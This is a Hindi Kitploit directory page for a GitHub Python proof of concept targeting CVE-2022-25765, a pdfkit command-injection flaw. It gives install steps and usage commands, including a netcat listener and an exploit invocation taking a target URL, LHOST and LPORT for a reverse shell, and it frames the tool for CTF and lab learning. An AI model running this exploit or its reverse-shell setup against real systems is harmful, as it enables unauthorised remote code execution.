Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-25765 — CVE-2022-25765 के लिए पायथन प्रूफ-ऑफ-कॉन्सेप्ट, pdfkit में एक कमांड इंजेक्शन भेद्यता, जो क्राफ्टेड PDF जनरेशन के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/innocentx0/cve-2022-25765
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubinnocentx0/cve-2022-25765

CVE-2022-25765

CVE-2022-25765 के लिए पायथन प्रूफ-ऑफ-कॉन्सेप्ट, pdfkit में एक कमांड इंजेक्शन भेद्यता, जो क्राफ्टेड PDF जनरेशन के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाती है।

रिपॉजिटरी देखें
16घं 53मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-25765 — pdfkit

CVE-2022-25765 के लिए PoC, जो pdfkit के कमजोर संस्करणों को प्रभावित करता है।

pdfkit 0.8.6 के साथ परीक्षण किया गया।

आवश्यकताएँ

  • Python 3.x
  • requests
  • colorama

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip3 install -r requirements.txt

या मैन्युअल रूप से:

root@kitploit:~
pip3 install requests colorama

उपयोग

root@kitploit:~
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>

उदाहरण: एक लिसनर चलाएँ

root@kitploit:~
nc -lvnp 4242
root@kitploit:~
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444

सेटअप

रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765

आवश्यकताएँ स्थापित करें:

root@kitploit:~
pip3 install -r requirements.txt

अपने लैब टारगेट के विरुद्ध PoC चलाएँ।

भेद्यता

CVE-2022-25765 pdfkit के कमजोर संस्करणों में एक कमांड इंजेक्शन भेद्यता है।

यह समस्या PDF जनरेशन प्रक्रिया में पारित उपयोगकर्ता-नियंत्रित इनपुट के अपर्याप्त सैनिटाइज़ेशन से संबंधित है।

नोट्स

यह PoC मुख्य रूप से सीखने और CTF/लैब वातावरण के लिए बनाया गया है।

यदि आप इसे आज़माने के लिए जगह ढूंढ रहे हैं, तो Hack The Box : मशीन: Precious।

अस्वीकरण

इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।

इस प्रोजेक्ट के कारण होने वाले दुरुपयोग या क्षति के लिए मैं जिम्मेदार नहीं हूँ।


INNOCENTx0

टूल डाउनलोड करें